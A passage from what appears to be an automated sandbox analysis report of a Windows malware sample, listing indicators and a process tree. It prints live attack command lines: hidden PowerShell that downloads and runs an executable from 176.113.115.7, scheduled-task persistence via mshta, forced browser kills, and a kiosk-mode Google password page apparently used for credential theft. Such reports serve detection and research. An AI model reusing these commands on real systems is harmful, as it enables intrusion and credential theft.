190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a c77bb98cda.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2928 schtasks.exe 3036 schtasks.exe 1912 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 2924 powershell.exe 2924 powershell.exe 2924 powershell.exe 2588 TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE 2108 rapes.exe 600 vertualiziren.exe 2484 cnntXtU.exe 1516 powershell.exe 1516 powershell.exe 1516 powershell.exe 2392 TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE 2396 powershell.exe 2408 gvnsf.exe 1724 powershell.exe 1460 powershell.exe 3032 powershell.exe 3032 powershell.exe 3032 powershell.exe 900 483d2fa8a0d53818306efeb32d3.exe 2144 cd4e8b5947.exe 2508 cb98fa6f53.exe 1780 c77bb98cda.exe 1780 c77bb98cda.exe 1780 c77bb98cda.exe 1780 c77bb98cda.exe 1780 c77bb98cda.exe 2836 51a7d2c853.exe 2664 65ac27f01e.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 3500 e6410dd2f6.exe 3500 e6410dd2f6.exe 3500 e6410dd2f6.exe 3500 e6410dd2f6.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 4016 powershell.exe 3420 v6Oqdnc.exe 3420 v6Oqdnc.exe 3504 ce4pMzk.exe 3504 ce4pMzk.exe 3504 ce4pMzk.exe 3504 ce4pMzk.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 2924 powershell.exe Token: SeDebugPrivilege 2484 cnntXtU.exe Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 1532 9cab6ad180.exe Token: SeDebugPrivilege 1540 taskkill.exe Token: SeDebugPrivilege 2084 taskkill.exe Token: SeDebugPrivilege 284 taskkill.exe Token: SeDebugPrivilege 1948 taskkill.exe Token: SeDebugPrivilege 2872 taskkill.exe Token: SeDebugPrivilege 2176 firefox.exe Token: SeDebugPrivilege 2176 firefox.exe Token: SeDebugPrivilege 3500 e6410dd2f6.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 4016 powershell.exe Token: SeDebugPrivilege 3504 ce4pMzk.exe -
Suspicious use of FindShellTrayWindow 22 IoCs
pid Process 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 2588 TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE 2400 nhDLtPT.exe 2072 cd0ae9eb0c.exe 2072 cd0ae9eb0c.exe 2072 cd0ae9eb0c.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2176 firefox.exe 2176 firefox.exe 2176 firefox.exe 2176 firefox.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 2072 cd0ae9eb0c.exe 2072 cd0ae9eb0c.exe 2072 cd0ae9eb0c.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2176 firefox.exe 2176 firefox.exe 2176 firefox.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe 2956 ef30a65d57.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2484 cnntXtU.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2688 wrote to memory of 2768 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 30 PID 2688 wrote to memory of 2768 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 30 PID 2688 wrote to memory of 2768 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 30 PID 2688 wrote to memory of 2768 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 30 PID 2688 wrote to memory of 2772 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 31 PID 2688 wrote to memory of 2772 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 31 PID 2688 wrote to memory of 2772 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 31 PID 2688 wrote to memory of 2772 2688 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe 31 PID 2768 wrote to memory of 2928 2768 cmd.exe 33 PID 2768 wrote to memory of 2928 2768 cmd.exe 33 PID 2768 wrote to memory of 2928 2768 cmd.exe 33 PID 2768 wrote to memory of 2928 2768 cmd.exe 33 PID 2772 wrote to memory of 2924 2772 mshta.exe 34 PID 2772 wrote to memory of 2924 2772 mshta.exe 34 PID 2772 wrote to memory of 2924 2772 mshta.exe 34 PID 2772 wrote to memory of 2924 2772 mshta.exe 34 PID 2924 wrote to memory of 2588 2924 powershell.exe 36 PID 2924 wrote to memory of 2588 2924 powershell.exe 36 PID 2924 wrote to memory of 2588 2924 powershell.exe 36 PID 2924 wrote to memory of 2588 2924 powershell.exe 36 PID 2588 wrote to memory of 2108 2588 TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE 37 PID 2588 wrote to memory of 2108 2588 TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE 37 PID 2588 wrote to memory of 2108 2588 TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE 37 PID 2588 wrote to memory of 2108 2588 TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE 37 PID 2108 wrote to memory of 2400 2108 rapes.exe 39 PID 2108 wrote to memory of 2400 2108 rapes.exe 39 PID 2108 wrote to memory of 2400 2108 rapes.exe 39 PID 2108 wrote to memory of 2400 2108 rapes.exe 39 PID 2400 wrote to memory of 2240 2400 nhDLtPT.exe 40 PID 2400 wrote to memory of 2240 2400 nhDLtPT.exe 40 PID 2400 wrote to memory of 2240 2400 nhDLtPT.exe 40 PID 2400 wrote to memory of 2240 2400 nhDLtPT.exe 40 PID 2108 wrote to memory of 2484 2108 rapes.exe 41 PID 2108 wrote to memory of 2484 2108 rapes.exe 41 PID 2108 wrote to memory of 2484 2108 rapes.exe 41 PID 2108 wrote to memory of 2484 2108 rapes.exe 41 PID 2240 wrote to memory of 600 2240 Gxtuum.exe 43 PID 2240 wrote to memory of 600 2240 Gxtuum.exe 43 PID 2240 wrote to memory of 600 2240 Gxtuum.exe 43 PID 2240 wrote to memory of 600 2240 Gxtuum.exe 43 PID 2108 wrote to memory of 2072 2108 rapes.exe 44 PID 2108 wrote to memory of 2072 2108 rapes.exe 44 PID 2108 wrote to memory of 2072 2108 rapes.exe 44 PID 2108 wrote to memory of 2072 2108 rapes.exe 44 PID 2072 wrote to memory of 1896 2072 cd0ae9eb0c.exe 45 PID 2072 wrote to memory of 1896 2072 cd0ae9eb0c.exe 45 PID 2072 wrote to memory of 1896 2072 cd0ae9eb0c.exe 45 PID 2072 wrote to memory of 1896 2072 cd0ae9eb0c.exe 45 PID 2072 wrote to memory of 1900 2072 cd0ae9eb0c.exe 46 PID 2072 wrote to memory of 1900 2072 cd0ae9eb0c.exe 46 PID 2072 wrote to memory of 1900 2072 cd0ae9eb0c.exe 46 PID 2072 wrote to memory of 1900 2072 cd0ae9eb0c.exe 46 PID 1896 wrote to memory of 3036 1896 cmd.exe 48 PID 1896 wrote to memory of 3036 1896 cmd.exe 48 PID 1896 wrote to memory of 3036 1896 cmd.exe 48 PID 1896 wrote to memory of 3036 1896 cmd.exe 48 PID 1900 wrote to memory of 1516 1900 mshta.exe 49 PID 1900 wrote to memory of 1516 1900 mshta.exe 49 PID 1900 wrote to memory of 1516 1900 mshta.exe 49 PID 1900 wrote to memory of 1516 1900 mshta.exe 49 PID 1516 wrote to memory of 2392 1516 powershell.exe 52 PID 1516 wrote to memory of 2392 1516 powershell.exe 52 PID 1516 wrote to memory of 2392 1516 powershell.exe 52 PID 1516 wrote to memory of 2392 1516 powershell.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2928
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE"C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"6⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2484
-
-
C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe"C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3036
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE"C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2392
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:2836 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "f2QhvmaOIYD" /tr "mshta \"C:\Temp\GH8RmsOFg.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1912
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\GH8RmsOFg.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1420 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:900
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe"C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2144 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1420
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1688 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 10288⤵
- Loads dropped DLL
- Program crash
PID:2884
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 5087⤵
- Loads dropped DLL
- Program crash
PID:1156
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe"C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2508 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1572
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe"C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1780
-
-
C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe"C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2836 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 12007⤵
- Loads dropped DLL
- Program crash
PID:2356
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe"C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2664
-
-
C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe"C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2956 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:284
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:332
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2176 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.0.1343690239\1625897888" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c58ad70-77ce-4714-a16d-718e2daf80da} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1288 110b7858 gpu9⤵PID:2636
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.1.694409263\743002394" -parentBuildID 20221007134813 -prefsHandle 1480 -prefMapHandle 1476 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d366d0d-4de4-478b-ad16-c0a158ce176b} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1492 e74258 socket9⤵PID:1952
-
-
